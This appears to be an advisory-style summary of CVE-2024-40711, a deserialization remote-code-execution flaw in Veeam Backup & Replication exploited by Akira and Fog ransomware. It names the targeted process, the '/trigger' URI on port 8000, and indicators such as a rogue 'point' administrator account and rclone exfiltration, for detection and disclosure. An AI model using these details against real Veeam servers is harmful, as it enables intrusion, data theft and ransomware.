Full Report
CVE-2024-40711 arises from the deserialization of untrusted data in the Veeam Backup & Replication software. This vulnerability can be exploited with low-complexity attacks, making it a threat to organizations relying on Veeam’s platform for backup, disaster recovery, and data...
Analysis Summary
# Vulnerability: Deserialization of Untrusted Data in Veeam Backup & Replication Leading to RCE
## CVE Details
- CVE ID: CVE-2024-40711
- CVSS Score: Not explicitly provided, but described as low-complexity leading to RCE. (Implies High severity)
- CWE: Deserialization of Untrusted Data
## Affected Systems
- Products: Veeam Backup & Replication software
- Versions: Not specified in detail, but confirmed to affect versions susceptible to this deserialization flaw.
- Configurations: Instances running Veeam Backup & Replication.
## Vulnerability Description
The vulnerability stems from the deserialization of untrusted data within Veeam Backup & Replication. Successful exploitation allows an attacker to achieve Remote Code Execution (RCE) by targeting the `Veeam.Backup.MountService.exe` process, specifically via the URI `/trigger` over port 8000. This process spawns system commands via `net.exe`.
## Exploitation
- Status: Exploited in the wild (Used by Akira and Fog ransomware groups)
- Complexity: Low
- Attack Vector: Network (Likely targeting remote services)
## Impact
- Confidentiality: High (Implied by subsequent credential abuse and data exfiltration observed)
- Integrity: High (Enables arbitrary code execution and system command execution)
- Availability: High (Observed in ransomware attacks)
## Remediation
### Patches
- **No specific patch version was detailed in the provided context.** Organizations must consult official Veeam advisories for patching information.
### Workarounds
- No specific workarounds were detailed in the provided context. Given the severity and active exploitation, patching should be the immediate priority.
## Detection
- **Indicators of Compromise (IoCs):**
- Observation of command execution via `Veeam.Backup.MountService.exe` on URI `/trigger` over port 8000.
- Creation of local user accounts named "point" added to Administrators and Remote Desktop Users groups.
- Use of `rclone` utility for data exfiltration following exploitation.
- **Detection Methods:** Network monitoring for traffic targeting port 8000 on Veeam services, and endpoint detection across system commands spawned by Veeam processes.
## References
- hxxps://infosec.exchange/@SophosXOps/113284564225476186
- hxxps://www.bleepingcomputer.com/news/security/akira-and-fog-ransomware-now-exploiting-critical-veeam-rce-flaw/